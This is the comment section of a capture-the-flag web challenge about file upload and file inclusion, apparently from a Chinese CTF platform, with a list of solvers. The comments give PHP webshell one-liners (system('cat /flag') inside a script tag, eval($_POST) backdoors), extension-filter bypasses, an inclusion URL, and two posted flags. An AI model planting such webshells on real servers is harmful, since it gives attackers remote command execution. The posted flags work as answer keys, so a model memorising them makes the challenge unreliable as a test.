评分(5)
解题动态
海浪geigei 攻破了该题 6小时前
alfsage 攻破了该题 18小时前
Hehe0619 攻破了该题 1天前
ww__ 攻破了该题 1天前
a1451753998 攻破了该题 1天前
dahuaaistudy 攻破了该题 2天前
YGLZ 攻破了该题 2天前
zhuizhui 攻破了该题 2天前
人闲桂花落 攻破了该题 3天前
roopelee 攻破了该题 4天前
dwx1583 攻破了该题 4天前
mecurio 攻破了该题 5天前
qidianzhi 攻破了该题 5天前
跃迁ctfer 攻破了该题 6天前
hackerbugku 攻破了该题 7天前
Future92 攻破了该题 7天前
maomaoht 攻破了该题 7天前
aaaaab 攻破了该题 8天前
千机www 攻破了该题 10天前
评论
zhuizhui 2天前
举报
<script language=php>system("cat /flag")</script> webshell.php;.png
leonleonleon 18天前
举报
1.'<'+'?'+'php' 和'>'会被过滤; 2.后缀名会被过滤; 3.用'<' script lanugage=php 后面自己闭合一下,最后文件包含上传获取flag
shingu 3月前
举报
file=/flag,怎么会这么简单?
volnu1l 5月前
举报
新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg
yanqiye 6月前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。
G3tcH4r 7月前
举报
花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
迷茫的三千面 8月前
举报
flag{414a91ba57a5e0b5a4eb725b75f5030e}
hao7 8月前
举报
flag{69fc76f3ef98a524a3ef56977fc02278}
CHLing 1年前
举报
http://114.67.175.224:18550/index.php?file=//flag
qiusheng 1年前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX